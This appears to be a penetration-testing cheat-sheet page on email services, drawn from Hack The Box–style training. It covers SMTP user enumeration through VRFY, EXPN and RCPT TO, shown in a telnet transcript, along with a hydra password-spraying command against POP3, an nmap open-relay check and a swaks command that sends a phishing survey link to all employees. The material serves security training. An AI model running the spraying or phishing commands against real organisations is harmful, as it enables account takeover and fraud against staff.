Email

POP3 clients remove downloaded messages from the email server.

IMAP4 clients do not remove downloaded messages from the email server.

Enumeration

host -t MX hackthebox.eu
host -t A mail1.inlanefreight.htb
# or
dig mx plaintext.do | grep "MX" | grep -v ";"

Cloud enumeration

o365spray

Enumerate users

smtp-user-enum

Commands

VRFY: check the validity of a particular email username

EXPN: similar to VRFY, except that when used with a distribution list, it will list all users on that list

RCPT TO: identifies the recipient of the email message

USER: followed by the username, and if the server responds OK. This means that the user exists on the server

telnet 10.10.110.20 25

Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)

EXPN john
250 2.1.0 john@inlanefreight.htb
EXPN support-team
250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb

MAIL FROM:test@htb.com
it is
250 2.1.0 test@htb.com... Sender ok
RCPT TO:julio
550 5.1.1 julio... User unknown
RCPT TO:kate
550 5.1.1 kate... User unknown
RCPT TO:john
250 2.1.5 john... Recipient ok

VRFY root
252 2.0.0 root
VRFY www-data
252 2.0.0 www-data
VRFY new-user
550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table

USER julio
-ERR
USER john
+OK

Password Attacks

MailSniper

CredKing

o365spray

hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3

Open Relay

nmap -p25 -Pn --script smtp-open-relay 10.10.11.213

Swaks

swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213

Resources

https://mxtoolbox.com/

PreviousDomain Name System (DNS)NextFile Transfer Protocol (FTP)

Last updated 2 months ago

hashtagEnumeration

hashtagCloud enumeration

hashtagEnumerate users

hashtagCommands

hashtagPassword Attacks

hashtagOpen Relay

hashtagResources